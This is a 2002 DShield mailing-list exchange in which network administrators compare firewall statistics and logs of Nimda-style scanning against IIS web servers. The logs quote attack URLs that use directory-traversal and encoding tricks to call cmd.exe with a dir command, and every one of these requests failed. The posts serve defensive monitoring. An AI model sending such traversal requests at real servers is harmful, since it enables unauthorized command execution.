[Dshield] nimda-like scanning?

Jim Tagart Jim.Tagart at bellcold.com
Tue Mar 26 22:04:12 GMT 2002


I just ran a summary report and I'm seeing more port 80 scanning than normal

Out of 20389 total Events, 278 Events were Rejected, 1.36% 
Of the 278 Events Rejected;
Restricted port attempts --------------------- 27 	9.71%	
Port scans --------------------- 14 	5.04%	
Broadcast/ Multicast queries --------------------- 	0.00%	
Port 80/ Web exploit attempts --------------------- 234 	84.17%	
Other traffic dropped/ blocked --------------------- 3 	1.08%	

RapTag is provided courtesy Tagart engineering
<http://www.tagartengineering.com> Please send your log reports to
Dshield.org <http://www.dshield.org>

Normally Port 80 only accounts for ~40% of our dropped packets.
We get scanned by Nimda type things daily.  Here's yesterday's summary

Out of 22193 total Events, 359 Events were Rejected, 1.62% 
Of the 359 Events Rejected;
Restricted port attempts --------------------- 50 	13.93%	
Port scans --------------------- 132 	36.77%	
Broadcast/ Multicast queries --------------------- 3 	0.84%	
Port 80/ Web exploit attempts --------------------- 160 	44.57%	
Suspect ICMP traffic --------------------- 	0.00%	
Other traffic dropped/ blocked --------------------- 14 	3.90%	

RapTag is provided courtesy Tagart engineering
<http://www.tagartengineering.com> Please send your log reports to
Dshield.org <http://www.dshield.org>

In my firewall logs we see lots of things like the following daily, if time
permits I try and contact the 'infected' machines caretaker, so far I've got
about a 30% sucess rate, soon I'll be setting up a tarpit for those lucky
machines that get infected, can't wait to do that actually....

op=GET arg=http://www/d/winnt/system32/cmd.exe?/c+dir result="404 Not Found"
proto=http rule=34 
op=GET arg=http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
result="400 Bad Request" proto=http rule=34 
op=GET arg=http://www/d/winnt/system32/cmd.exe?/c+dir result="404 Not Found"
proto=http rule=34 
op=GET
arg=http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
?/c+dir result="404 Not Found" 


> -----Original Message-----
> From:	Kelly Martin [SMTP:kellym at fb00.fb.org]
> Sent:	Tuesday, March 26, 2002 1:02 PM
> To:	'list at dshield.org'
> Subject:	[Dshield] nimda-like scanning?
> 
> Just noticed the following in my system logs.
> 
> First, a segment of an Apache log on one of our web servers:
> 
> 80.128.246.185 - - [26/Mar/2002:13:59:03 -0600] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 243
> 80.128.246.185 - - [26/Mar/2002:13:59:03 -0600] "GET
> /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 246
> 80.128.246.185 - - [26/Mar/2002:13:59:07 -0600] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 243
> 80.128.246.185 - - [26/Mar/2002:13:59:07 -0600] "GET
> /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 246
> 80.128.246.185 - - [26/Mar/2002:13:59:08 -0600] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 243
> 80.128.246.185 - - [26/Mar/2002:13:59:08 -0600] "GET
> /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 246
> 
> Second, the output of my portscan detector (which works by parsing my
> PIX's
> deny log):
> 
> Tue Mar 26 13:59:28 2002 scanning complete from 80.128.246.185, 5067 hits
> in
> 104 seconds (471 hosts, 1 ports [TCP:80])
> 
> The IP belongs to t-dialin.net, which is probably only second to
> wanadoo.fr
> in proportion of native scriptkiddies.
> 
> Judging by these numbers, I'd say both of my Class C's were scanned rather
> noisily (5067 hits in 104 seconds?) for vulnerable IIS servers.
> 
> Anyone else seen this sweep across them?
> 
> Kelly
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list